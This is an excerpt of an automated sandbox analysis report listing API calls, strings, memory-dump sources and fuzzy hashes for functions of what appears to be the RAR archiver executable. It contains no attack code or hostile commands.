Opcode Fuzzy Hash: 573272f0f587a5841e96f6de12058517ff70df0c9770e23d059943033ae7e521
Instruction Fuzzy Hash: 11514473528BD295E7109F34A8442ED37E8FB40F88F18427ADE884B79ADF389452C325

Function 00007FF695D3231C Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF695D32344

Part of subcall function 00007FF695D324D4: GetModuleHandleExW.KERNEL32 ref: 00007FF695D324F4
Part of subcall function 00007FF695D324D4: GetProcAddress.KERNEL32 ref: 00007FF695D3250A
Part of subcall function 00007FF695D324D4: FreeLibrary.KERNEL32 ref: 00007FF695D3252F

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
Instruction ID: 41299dadf90d4b9e0cfc29b4f15064322f6697043d5f66b845779923f8944e15
Opcode Fuzzy Hash: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
Instruction Fuzzy Hash: ED418C21E0964382FB789B55A45027922E1EF91F88F1066B9D90ECB6D1EF3CEC4DC348

Function 00007FF695CE4D1C Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetCommandLineW.KERNEL32 ref: 00007FF695CE4D47

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: CommandLine
String ID:
API String ID: 3253501508-0
Opcode ID: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
Instruction ID: 1acdd9c3da1b8ef563c97fef565a4d418226f1eaa38134d55dbda8f99ba740f3
Opcode Fuzzy Hash: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
Instruction Fuzzy Hash: 8D018013A0C642D5EA20EB16A4822BD56F0EF89F94F481479EE4D873AADE3DDD598304

Function 00007FF695D1A924 Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

CompareStringA.KERNELBASE ref: 00007FF695D1A998

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: CompareString
String ID:
API String ID: 1825529933-0
Opcode ID: c6d6092b44314f1ca84e49c6934a556cb6b0378942b6d95cbaf43525491768f7
Instruction ID: 58efd6ac7d7488170045d5f8d33f544028e3e574dd560d6adfa079aa20857373
Opcode Fuzzy Hash: c6d6092b44314f1ca84e49c6934a556cb6b0378942b6d95cbaf43525491768f7
Instruction Fuzzy Hash: 5C01A76170C65285EA205F06A40406AE690FF49FC4F585574EF8D8BB5ACE3CD4468708

Function 00007FF695D34B8C Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ca30e85b47fa1e18d3f1659bb3f59f1703126fc617b20a809fafb72b1d5571b6
Instruction ID: 478e3785c574a00a89f97cf167c065c5814a918856c3bb28ecc1ef88c736ff16
Opcode Fuzzy Hash: ca30e85b47fa1e18d3f1659bb3f59f1703126fc617b20a809fafb72b1d5571b6
Instruction Fuzzy Hash: 9C014F51A0D64341FD7497665A4827A12D0DF44FDDF08A3B0ED2DC62E6ED3DEC09820D

Function 00007FF695CF4554 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE ref: 00007FF695CF4590

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 37315976747a324bc4a89ca9f4e050d50d4baea4dbab69f22b0b8f40f318d585
Instruction ID: c71589fa422e74bfd3a3e92de1203eeace018f16a9eb6586e0b878d5241aec17
Opcode Fuzzy Hash: 37315976747a324bc4a89ca9f4e050d50d4baea4dbab69f22b0b8f40f318d585
Instruction Fuzzy Hash: BBF086329082C195DA219B7551412F827A0DB06FB4F0853B9DE7C4B2C7CE5C98C89710

Function 00007FF695D34AB4 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 00007FF695D34AF2

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
Instruction ID: 362c19e9d7a9684f1ec0ec83ffe4748e0315251b5fd1102855ff18070a9fc108
Opcode Fuzzy Hash: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
Instruction Fuzzy Hash: 44F0FE12B4D24245FE74ABB1595927512C0DF44FA8F4C2BB0ED2EC62C1EE7CEC49821C

Function 00007FF695D038A4 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
Instruction ID: c64be2f5aeb63e6e08d0f0257e63f2eb477a97ba08673fa0c3fe16e2e16e8cbe
Opcode Fuzzy Hash: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
Instruction Fuzzy Hash: 8FE04650F1930280ED782A72285147902C09F6AF80E1476FACD1FDA382DD2EAC9D160A

Function 00007FF695D3FA10 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE ref: 00007FF695D3FA20

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
Instruction ID: d04ab11bb66677c48abeb848c20e283994fb34f3bc65677f9d1e672cc70c29f5
Opcode Fuzzy Hash: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
Instruction Fuzzy Hash: 00D09EA5E1A90785F764DB81E84573012E1FF54F99F4127B8C81D89551CFBD285C8708

Function 00007FF695CF4538 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(00000000,?,00000000,?,00007FF695D17A8C), ref: 00007FF695CF4549

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
Instruction ID: 61af75dd42fbf3741d708b979c326122413ed76f9d4f97a5ac18875074ae5358
Opcode Fuzzy Hash: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
Instruction Fuzzy Hash: D1C02B32E01481C0C514672E88950341160FF44F35FD01370C13D4A1F0DF5848EF0300

Function 00007FF695CF1930 Relevance: 1.3, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE ref: 00007FF695CF1958

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
Instruction ID: fba2a4a6e49ec84d5aa97e5f6daf5ae350b5c8890bd96bf57e8aaa97d39758c4
Opcode Fuzzy Hash: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
Instruction Fuzzy Hash: 03F08C23A0864286FB348B65E44037836B0DB10F78F986378DA7D860D8CE68DE96C7D0

Non-executed Functions

Function 00007FF695CF67E0 Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 441COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF695D149F4: LoadStringW.USER32 ref: 00007FF695D14A7B
Part of subcall function 00007FF695D149F4: LoadStringW.USER32 ref: 00007FF695D14A94

Part of subcall function 00007FF695CE8444: fflush.LIBCMT ref: 00007FF695CE8477

Part of subcall function 00007FF695D1B6D0: Sleep.KERNEL32(?,?,?,?,00007FF695CECBED,?,00000000,?,00007FF695D17A8C), ref: 00007FF695D1B730

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF695CF6CB0

Strings

%s%s, xrefs: 00007FF695CF6A74
%21ls %9ls %3d%% %28ls %u, xrefs: 00007FF695CF6F85
V, xrefs: 00007FF695CF6D62
%s%s, xrefs: 00007FF695CF6B24
%21ls %18s %lu, xrefs: 00007FF695CF6FA4
%21ls %9ls %3d%% %-27ls %u, xrefs: 00007FF695CF6DA2
----------- --------- -------- ----- ---------- ----- -------- ----, xrefs: 00007FF695CF6D6A
%s%s, xrefs: 00007FF695CF6AB2
EOF, xrefs: 00007FF695CF6CD1
%s%s, xrefs: 00007FF695CF6A17
%.10ls %u, xrefs: 00007FF695CF6C9D
%12ls: %ls, xrefs: 00007FF695CF6CD8
----------- --------- ---------- ----- ----, xrefs: 00007FF695CF6DB0
RAR 4, xrefs: 00007FF695CF6987
%s%s, xrefs: 00007FF695CF69EB
RAR 5, xrefs: 00007FF695CF698E
%s: , xrefs: 00007FF695CF697B
%s: %s, xrefs: 00007FF695CF6962
%s%s, xrefs: 00007FF695CF6AED
RAR 1.4, xrefs: 00007FF695CF69A0
%21ls %-16ls %u, xrefs: 00007FF695CF6DCD
%12ls: %ls, xrefs: 00007FF695CF6D01
%s%s, xrefs: 00007FF695CF69C0

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: LoadString$Sleepfflushswprintf
String ID: %12ls: %ls$%12ls: %ls$%21ls %-16ls %u$%21ls %9ls %3d%% %-27ls %u$%s: $%s: %s$----------- --------- -------- ----- ---------- ----- -------- ----$----------- --------- ---------- ----- ----$%.10ls %u$%21ls %18s %lu$%21ls %9ls %3d%% %28ls %u$%s%s$%s%s$%s%s$%s%s$%s%s$%s%s$%s%s$EOF$RAR 1.4$RAR 4$RAR 5$V
API String ID: 668332963-4283793440
Opcode ID: cff16b410779efd6418cbb4bfaefd77790891fdcb5da60b35bb77876aa469163
Instruction ID: 8de40eeafc83ec18ff22453e80a0478988c1f139770b279b48ae7fa601586e70
Opcode Fuzzy Hash: cff16b410779efd6418cbb4bfaefd77790891fdcb5da60b35bb77876aa469163
Instruction Fuzzy Hash: 2B22B423A0C6C295EB30DB24E8511F967F1FF41B44F4411BAEA8D8769ADE2CEE49D704

Function 00007FF695CED2C0 Relevance: 23.1, APIs: 9, Strings: 4, Instructions: 313fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00007FF695CED4A6
CloseHandle.KERNEL32 ref: 00007FF695CED4B9

Part of subcall function 00007FF695CEEF50: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF695CEEE47), ref: 00007FF695CEEF73
Part of subcall function 00007FF695CEEF50: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,00007FF695CEEE47), ref: 00007FF695CEEF84
Part of subcall function 00007FF695CEEF50: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF695CEEFA7
Part of subcall function 00007FF695CEEF50: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF695CEEFCA
Part of subcall function 00007FF695CEEF50: GetLastError.KERNEL32 ref: 00007FF695CEEFD4
Part of subcall function 00007FF695CEEF50: CloseHandle.KERNEL32 ref: 00007FF695CEEFE7

CreateDirectoryW.KERNEL32 ref: 00007FF695CED4C6
CreateFileW.KERNEL32 ref: 00007FF695CED64A
DeviceIoControl.KERNEL32 ref: 00007FF695CED68B
CloseHandle.KERNEL32 ref: 00007FF695CED69A
GetLastError.KERNEL32 ref: 00007FF695CED6AD
RemoveDirectoryW.KERNEL32 ref: 00007FF695CED6FA
DeleteFileW.KERNEL32 ref: 00007FF695CED705

Part of subcall function 00007FF695CF2310: FlushFileBuffers.KERNEL32 ref: 00007FF695CF233E
Part of subcall function 00007FF695CF2310: SetFileTime.KERNEL32 ref: 00007FF695CF23DB

Part of subcall function 00007FF695CF1930: CloseHandle.KERNELBASE ref: 00007FF695CF1958

Part of subcall function 00007FF695CF39E0: SetFileAttributesW.KERNEL32(?,00007FF695CF34EE,?,?,?,?,00000800,00000000,00000000,00007FF695D038CB,?,?,?,00007FF695D041EC), ref: 00007FF695CF3A0F
Part of subcall function 00007FF695CF39E0: SetFileAttributesW.KERNEL32(?,00007FF695CF34EE,?,?,?,?,00000800,00000000,00000000,00007FF695D038CB,?,?,?,00007FF695D041EC), ref: 00007FF695CF3A3C

Strings

UNC\, xrefs: 00007FF695CED3BD
SeRestorePrivilege, xrefs: 00007FF695CED31C
SeCreateSymbolicLinkPrivilege, xrefs: 00007FF695CED328
\??\, xrefs: 00007FF695CED390

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: File$CloseHandle$Create$AttributesDirectoryErrorLastProcessToken$AdjustBuffersControlCurrentDeleteDeviceFlushLookupOpenPrivilegePrivilegesRemoveTimeValue
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 2750113785-3508440684
Opcode ID: 1a7d86559847920f8bb109ab3d7291439b8a259b3f48a060f5ee007c4e7161c6
Instruction ID: 3b06b6d0ba4739e0532f05759fb45ecf47dcd3455d1aecb3a29a802f5bee29b7
Opcode Fuzzy Hash: 1a7d86559847920f8bb109ab3d7291439b8a259b3f48a060f5ee007c4e7161c6
Instruction Fuzzy Hash: 4BD1AC26A08686D6EB309F20E8412F937F0FB54B98F405279DA5D876D9DE3CDE0AC740

Function 00007FF695D1AE50 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 281libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF695CD2E4C), ref: 00007FF695D1AEE9
GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF695CD2E4C), ref: 00007FF695D1AF01
GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF695CD2E4C), ref: 00007FF695D1AF19
GetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF695CD2E4C), ref: 00007FF695D1AF75
GetFullPathNameA.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF695CD2E4C), ref: 00007FF695D1AFB0
SetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF695CD2E4C), ref: 00007FF695D1B23B
